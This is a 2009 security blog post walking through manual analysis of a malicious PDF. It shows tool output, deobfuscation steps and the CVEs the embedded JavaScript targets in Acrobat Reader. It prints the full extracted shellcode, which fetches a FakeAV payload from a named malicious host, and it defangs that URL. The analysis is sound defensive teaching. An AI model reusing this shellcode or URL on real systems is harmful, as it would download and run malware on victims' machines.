Exploits: Analyzing a malicious PDF Document

December 21, 2009 | Jaime Blasco

In this post, I will walk through a real-world example of how to manually analyze a malicious PDF document.

A few days ago I collected a malicious PDF file. Usually, Wepawet does an excellent job of analyzing such files automatically.

In this case, Wepawet reported “No exploits were identified.”, so the malicious PDF file probably uses some tricks to defeat automatic analysis.

We start by collecting some basic information about the PDF file:

MD5: 67f3da49ac07e6a5b3be1a743c3ea40d
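The hash can be reproduced with any MD5 tool. As a minimal Python sketch (the helper name file_md5 is illustrative and not part of the original workflow):

```python
import hashlib


def file_md5(path, chunk_size=65536):
    """Return the hex MD5 digest of a file, reading it in chunks."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        # iter() with a sentinel stops when read() returns an empty bytes object
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()
```

Calling file_md5("pdf.php") on the sample should give the digest listed above, assuming the file is saved under that name.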

Next, we collect some PDF object information to begin the analysis, using Didier Stevens' pdfid.py:

mac-jaime:pdf1 jaimeblasco$ python pdfid.py pdf.php

PDFiD 0.0.9 pdf.php

 PDF Header: %PDF-1.4

 obj                    9

 endobj                 9

 stream                 3

 endstream              3

 xref                   1

 trailer                1

 startxref              1

 /Page                  1

 /Encrypt               0

 /ObjStm                0

 /JS                    1

 /JavaScript            2

 /AA                    0

 /OpenAction            0

 /AcroForm              0

 /JBIG2Decode           0

 /RichMedia             0

 /Colors > 2^24         0
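To give an idea of what this kind of triage does, here is a rough Python sketch that counts a few of the same keywords in the raw bytes of a file. It is a deliberately simplified approximation and not how pdfid.py is implemented: the keyword list and the function name count_keywords are assumptions made for illustration, and the sketch ignores name obfuscation such as #xx hex escapes.

```python
import re

# A small, illustrative subset of the keywords reported above.
KEYWORDS = [b"obj", b"endobj", b"stream", b"endstream",
            b"/JS", b"/JavaScript", b"/AA", b"/OpenAction"]


def count_keywords(data, keywords=KEYWORDS):
    """Count whole-word occurrences of each keyword in raw PDF bytes."""
    counts = {}
    for keyword in keywords:
        # Bare words must not be the tail of a longer word ("obj" in "endobj").
        # Names starting with "/" may directly follow another name ("/S/JS").
        prefix = rb"" if keyword.startswith(b"/") else rb"(?<![A-Za-z0-9])"
        pattern = prefix + re.escape(keyword) + rb"(?![A-Za-z0-9])"
        counts[keyword.decode("ascii")] = len(re.findall(pattern, data))
    return counts
```

A non-zero count for /JS or /JavaScript, as in the output above, is the cue to look at the streams more closely.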

Now we know the file contains JavaScript and stream objects that we should analyze. First, we search for Filter objects inside the PDF using Didier Stevens' pdf-parser.py:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --search Filter pdf.php

obj 5 0

 Type:

 Referencing:

 Contains stream

 [(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '4852'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]



 <<

   /Length 4852

   /Filter /FlateDecode



 >>



obj 6 0

 Type:

 Referencing:

 Contains stream

 [(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '299'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]



 <<

   /Length 299

   /Filter /FlateDecode



 >>
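Both objects use /FlateDecode, which is plain zlib compression. As a minimal sketch of what a filter pass has to do for this filter, the following Python locates stream bodies with a regular expression and inflates them. The regex-based stream detection and the name inflate_streams are simplifying assumptions for illustration; a real parser honours /Length and handles other filters.

```python
import re
import zlib

# Naive stream locator: everything between "stream<EOL>" and "endstream".
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)


def inflate_streams(pdf_bytes):
    """Return the inflated contents of every stream that zlib can decode."""
    results = []
    for match in STREAM_RE.finditer(pdf_bytes):
        try:
            # decompressobj() tolerates the trailing EOL before "endstream".
            results.append(zlib.decompressobj().decompress(match.group(1)))
        except zlib.error:
            # Not FlateDecode (or damaged data): skip this stream.
            continue
    return results
```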

We have two streams that should be analyzed carefully. Let’s look at the raw data of obj 5 0:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --object 5 --raw --filter pdf.php | more

obj 5 0

 Type:

 Referencing:

 Contains stream



<< /Length 4852 /Filter /FlateDecode

 >>



 <<

   /Length 4852

   /Filter /FlateDecode



 >>



 colkokasd assa 443562df sdfs23234266colkokasd assa 443562df sdfs23234275colkokasd assa

443562df sdfs2323426ecolkokasd assa 443562df sdfs23234263colkokasd assa 443562df sdfs23234274colkokasd

assa 443562df sdfs

23234269colkokasd assa 443562df sdfs2323426fcolkokasd assa 443562df…......

...........

...........

...........

We have 172K of stream data, which we save for later analysis. Now we dump the raw data of obj 6:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --object 6 --raw --filter pdf.php | more

obj 6 0

 Type:

 Referencing:

 Contains stream



<< /Length 299 /Filter /FlateDecode

 >>



 <<

   /Length 299

   /Filter /FlateDecode



 >>

This is much better: we have some JavaScript with eval and unescape calls and a reference to this.info.title.

If we inspect info.title, we see that it is linked to the obj 5 0 data we extracted.

As we can see, the JavaScript code replaces “colkokasd assa 443562df sdfs232342” in the obj 5 stream with the value of the variable uWReX84wKBTnU (“%”).

To emulate the JavaScript code, we first dump the obj 5 data and then use sed to perform the replacement:

python pdf-parser.py --object 5 --raw --filter pdf.php > obj5

sed -i "s/colkokasd assa 443562df sdfs232342/%/g" obj5
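The same substitution can be sketched in Python, which also sidesteps the differences between GNU and BSD sed in how -i is handled. The function name strip_marker is illustrative; the marker string is the one observed in the obj 5 stream.

```python
# Filler string the malicious JavaScript swaps for "%" before calling unescape().
MARKER = "colkokasd assa 443562df sdfs232342"


def strip_marker(stream_text, marker=MARKER, replacement="%"):
    """Replace every occurrence of the filler marker, like sed's s/.../%/g."""
    return stream_text.replace(marker, replacement)
```

Applied to the text of the obj5 dump, this should yield the percent-encoded string that is later passed to unescape.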

We create a JS file that assigns the replaced data to var JmfNzd7NdGNhf = "%66%75%6e%63%74%69%6f%6…......." and then calls print(unescape(JmfNzd7NdGNhf));.

We then execute the file with SpiderMonkey:

mac-jaime:pdf1 jaimeblasco$ js obj_5.js
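If no JavaScript interpreter is at hand, the decoding step can be approximated in Python. JavaScript's unescape() turns %XX and %uXXXX sequences into the corresponding characters; the sketch below mimics that behaviour with a regular expression. The name js_unescape is hypothetical, and this is an emulation under that assumption rather than the interpreter's actual implementation.

```python
import re

# %uXXXX (16-bit code unit) or %XX (single byte treated as a code point).
_ESCAPE_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def js_unescape(text):
    """Approximate JavaScript's unescape() for %XX and %uXXXX sequences."""
    def _decode(match):
        hex_digits = match.group(1) or match.group(2)
        return chr(int(hex_digits, 16))
    # Anything that is not a valid escape sequence is left untouched.
    return _ESCAPE_RE.sub(_decode, text)
```

For example, js_unescape("%66%75%6e%63%74%69%6f") returns "functio", the beginning of the keyword the obfuscated script starts with.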

Now we have the deobfuscated JavaScript code. The PPPDDDFF() function checks the Acrobat Reader version using the app.viewerVersion property of the Adobe JavaScript API and exploits a different vulnerability for each of the identified versions:

  • CVE-2007-5659: Exploiting Collab.collectEmailInfo()
  • CVE-2008-2992: Exploiting util.printf()
  • CVE-2009-0927: Exploiting Collab.getIcon()

We also found shellcode. Here is the raw data extracted using SpiderMonkey:

shellcode = "\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x33\xc0\x64\x8b\x40\x30\x78\x0c\x8b\x40\x0c" \

                        "\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x58\x3c\x6a" \

                        "\x44\x5a\xd1\xe2\x2b\xe2\x8b\xec\xeb\x4f\x5a\x52\x83\xea\x56\x89\x55\x04\x56" \

                        "\x57\x8b\x73\x3c\x8b\x74\x33\x78\x03\xf3\x56\x8b\x76\x20\x03\xf3\x33\xc9\x49" \

                        "\x50\x41\xad\x33\xff\x36\x0f\xbe\x14\x03\x38\xf2\x74\x08\xc1\xcf\x0d\x03\xfa" \

                        "\x40\xeb\xef\x58\x3b\xf8\x75\xe5\x5e\x8b\x46\x24\x03\xc3\x66\x8b\x0c\x48\x8b" \

                        "\x56\x1c\x03\xd3\x8b\x04\x8a\x03\xc3\x5f\x5e\x50\xc3\x8d\x7d\x08\x57\x52\xb8" \

                        "\x33\xca\x8a\x5b\xe8\xa2\xff\xff\xff\x32\xc0\x8b\xf7\xf2\xae\x4f\xb8\x65\x2e" \

                        "\x65\x78\xab\x66\x98\x66\xab\xb0\x6c\x8a\xe0\x98\x50\x68\x6f\x6e\x2e\x64\x68" \

                        "\x75\x72\x6c\x6d\x54\xb8\x8e\x4e\x0e\xec\xff\x55\x04\x93\x50\x33\xc0\x50\x50" \

                        "\x56\x8b\x55\x04\x83\xc2\x7f\x83\xc2\x31\x52\x50\xb8\x36\x1a\x2f\x70\xff\x55" \

                        "\x04\x5b\x33\xff\x57\x56\xb8\x98\xfe\x8a\x0e\xff\x55\x04\x57\xb8\xef\xce\xe0" \

                        "\x60\xff\x55\x04\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x70\x75" \

                        "\x74\x74\x61\x69\x6d\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x6c\x6f\x61\x64\x2e\x70" \

                        "\x68\x70\x3f\x73\x70\x6c\x3d\x70\x64\x66\x5f\x65\x78\x70"

The shellcode downloads a binary file from hxxp://www.inputtaiment.com/load.php?spl=pdf_exp (Mal/FakeAV-BX).
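The download URL is stored as plain ASCII at the tail of the shellcode, so a strings-style scan is enough to recover it. The sketch below copies the last bytes of the shellcode shown above and extracts runs of printable characters; the helper names printable_strings and defang and the minimum length of 6 are arbitrary choices for illustration.

```python
import re

# Final bytes of the shellcode listed above, copied verbatim.
SHELLCODE_TAIL = (
    b"\x60\xff\x55\x04\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x70\x75"
    b"\x74\x74\x61\x69\x6d\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x6c\x6f\x61\x64\x2e\x70"
    b"\x68\x70\x3f\x73\x70\x6c\x3d\x70\x64\x66\x5f\x65\x78\x70"
)


def printable_strings(blob, min_len=6):
    """Return runs of printable ASCII of at least min_len bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [run.decode("ascii") for run in re.findall(pattern, blob)]


def defang(url):
    """Rewrite the scheme so the URL is not clickable in reports."""
    return url.replace("http", "hxxp", 1)


if __name__ == "__main__":
    for found in printable_strings(SHELLCODE_TAIL):
        print(defang(found))
```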

